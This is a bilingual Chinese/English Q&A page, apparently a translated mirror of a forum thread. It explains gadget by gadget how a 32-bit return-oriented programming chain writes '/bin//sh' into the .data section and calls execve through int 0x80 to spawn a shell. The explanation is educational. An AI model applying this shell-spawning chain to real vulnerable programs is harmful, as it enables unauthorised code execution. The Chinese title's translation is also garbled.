通过面向收益的编程自动开发 [英] Automatic exploitation via return oriented programming

问题描述

我需要帮助来了解此图像中发生的情况:.

I need help understanding what is going on in this image: .

我看不到是@ .data指令与mov dword ptr [edx], eax结合完成的工作，特别是考虑到edx紧随其后弹出.

What I fail to see is what the @ .data instructions accomplish in combination with the mov dword ptr [edx], eax, especially considered that edx is popped right after.

推荐答案

简而言之，@ .data行是指用于写入"/bin//sh"字符串的可写内存，该字符串随后将被执行. .data部分只是可执行文件的可读/可写部分，该可执行文件已加载到内存中，通常用于存储全局变量.

In short, the @ .data lines refer to writable memory that is used to write the "/bin//sh" string, which is later executed. The .data section is just a readable/writable section of the executable that is loaded into memory, typically used to store global variables.

以下是ROP链工作方式的细分:

Here's a breakdown of how the ROP chain works:

pop edx ; ret
@ .data

这两个小工具将.data部分的地址弹出到edx.

These two gadgets pop the address of the .data section into edx.

pop eax ; ret
'/bin'

这些小工具弹出0x6e69622f或/bin//sh字符串的前四个字符进入eax

These gadgets pop 0x6e69622f, or the first four characters of the /bin//sh string into eax

mov dword ptr [edx], eax ; ret

然后将eax的内容写入地址edx；此时，字符串的前四个字符已写在.data部分的开头

Then this writes the contents of eax at the address edx; at this point the first four characters of the string have been written at the beginning of the .data section

pop edx ; ret
@ .data + 4

pop eax ; ret
'//sh'

mov dword ptr [edx], eax ; ret

这部分做完全相同的事情来写入字符串的后四个字节

This part does the exact same thing to write the next four bytes of the string

pop edx ; ret
@ .data + 8

xor eax, eax ; ret

mov dword ptr [edx], eax ; ret

然后在字符串后写入四个空字节以将其空终止

And then this writes four null bytes after the string to null-terminate it

pop ebx ; ret
@ .data

这将获取ebx

pop ecx ; pop ebx ; ret
@ .data + 8
padding without overwrite ebx

这会将.data+8写入ecx，并将.data写入ebx. (请注意，这里的第三行是0x080f4060，我们可以看到与上面三行中的.data相同的地址)

This writes .data+8 to ecx and writes .data to ebx. (Notice that the third line here is 0x080f4060, which we can see is the same address of .data three lines above)

pop edx ; ret
@ .data + 8

这会将.data+8写入edx

xor eax, eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret

这会将11写入eax

int 0x80

这将在Linux上执行系统调用. 此处是了解系统调用的重要资源.我们看到，当eax为11(0xb)时，它是对execve的调用，其定义如下:

This executes a system call on Linux. Here is a great resource for understanding system calls. We see that when eax is 11 (0xb), it is a call to execve, which is defined as follows:

int execve(const char *filename, char *const argv[], char *const envp[]);

因此，ebx是filename，ecx是argv，而edx是envp.此时，ebx指向字符串/bin//sh，而ecx和edx均为.data+8.它们都被视为字符串，但是由于.data+8包含空字节，因此ecx和edx是空字符串.因此呼叫实质上是execve("/bin//sh", "", "");

So then ebx is filename, ecx is argv, and edx is envp. At this point, ebx points to the string /bin//sh, and both ecx and edx are .data+8. They are both treated as strings, but since .data+8 contains the null byte, ecx and edx are the empty string. So the call is essentially execve("/bin//sh", "", "");

这篇关于通过面向收益的编程自动开发的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！